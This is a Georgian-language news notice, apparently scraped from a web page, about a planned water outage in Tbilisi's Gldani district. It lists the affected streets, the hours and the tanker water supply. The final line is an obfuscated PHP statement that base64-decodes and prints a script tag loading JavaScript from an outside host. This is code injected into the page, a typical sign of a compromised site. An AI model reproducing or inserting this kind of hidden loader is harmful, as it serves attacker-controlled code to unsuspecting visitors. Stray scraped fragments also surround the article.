celsiusi
ავერსი საქკაბელი
ჯორჯიან უოთერ ენდ ფაუერი გლდანის რაიონის  სტაბილური წყალმომარაგებისთვის ხერგიანის ქუჩაზე სატუმბო სადგურზე, რეზერვუარზე და გამანაწილებელ ქსელზე აუცილებელ ტექნიკურ სამუშაოებს ჩაატარებს. ამის შესახებ ინფორმაციას კომპანია ავრცელებს. 
 
დამონტაჟდება ჩამკეტ-მარეგულირებელი ურდულები, ინტენსიური  პროფილაქტიკური რეცხვითი სამუშაოები  განხორციელდება სატუმბო სადგურის ტერიტორიაზე არსებულ რეზერვუარსა და გამანაწილებელ ქსელზე. 
 
სატუმბო სადგურზე ტექნიკური სამუშაოები 16 აპრილის 00:30 საათზე დაიწყება და  17 აპრილის დილის  08:00 საათზე დასრულდება, რა დროსაც წყალმომარაგება შეეზღუდება
 
გლდანის რაიონში: 
გლდანის მე-3, 3ა, 4, 5, 6, 7, 8 მიკრორაიონებს, სოფელ ბერთუბანს, წყაროთუბანს, გიორგი წმინდას, ტიხონოვის, ხერგიანის, წინამძღვრიშვლის, მარჯანიშვილის, მიქატაძის, გულისაშვილის, მაისურაძის, მებაღიშვილის, კულა გლდანელის, სააკაძის, რუსთაველის, ბორჩალოელის, თეთრი ტბის ქუჩას და დასახლებას, კობახიძის, კობახიძის შეს, ინგუშეთის, ბაბილოძის, ბატონიშვილის, კალანდაძის, ფიროსმანის, წყაროს, ოშკელის, ჟღენტის, ბელქანიას,მახვილაძის, ნასერალას, ბუცხრიკიძის, სამხარაძის, მირაქიშვილის, ჯაბიძის, ტაბატაძის, ვართაგავას, კანდელაკის, კობერიძის, კვეესის ბარათაშვილის, ხერგიანის, მიდელაურის, საბაშვილის, რაზმაძის, მამკოდის, მორეტის, კეცხოველის, ნანეიშვილის, ელ. ქვესადგურის დას, პატარა ტბის ქუჩებს.
 
რეზერვუარისა და გამანაწილებელი ქსელის ინტენსიური  რეცხვითი სამუშაოები ღამის საათებში განხორციელდება, რაც  აღნიშნულ პერიოდში   შენგელიას, ხიზანიშვილის  და პატარა ტბის მიმდებარე ქუჩებზე  წყლის  დინებას გამოიწვევს. 
 
ჯორჯიან უოთერ ენდ ფაუერი ბოდიშს უხდის მომხმარებლებს შექმნილი დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
 
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის - 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით - http://www.gwp.ge
 
 
1289
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");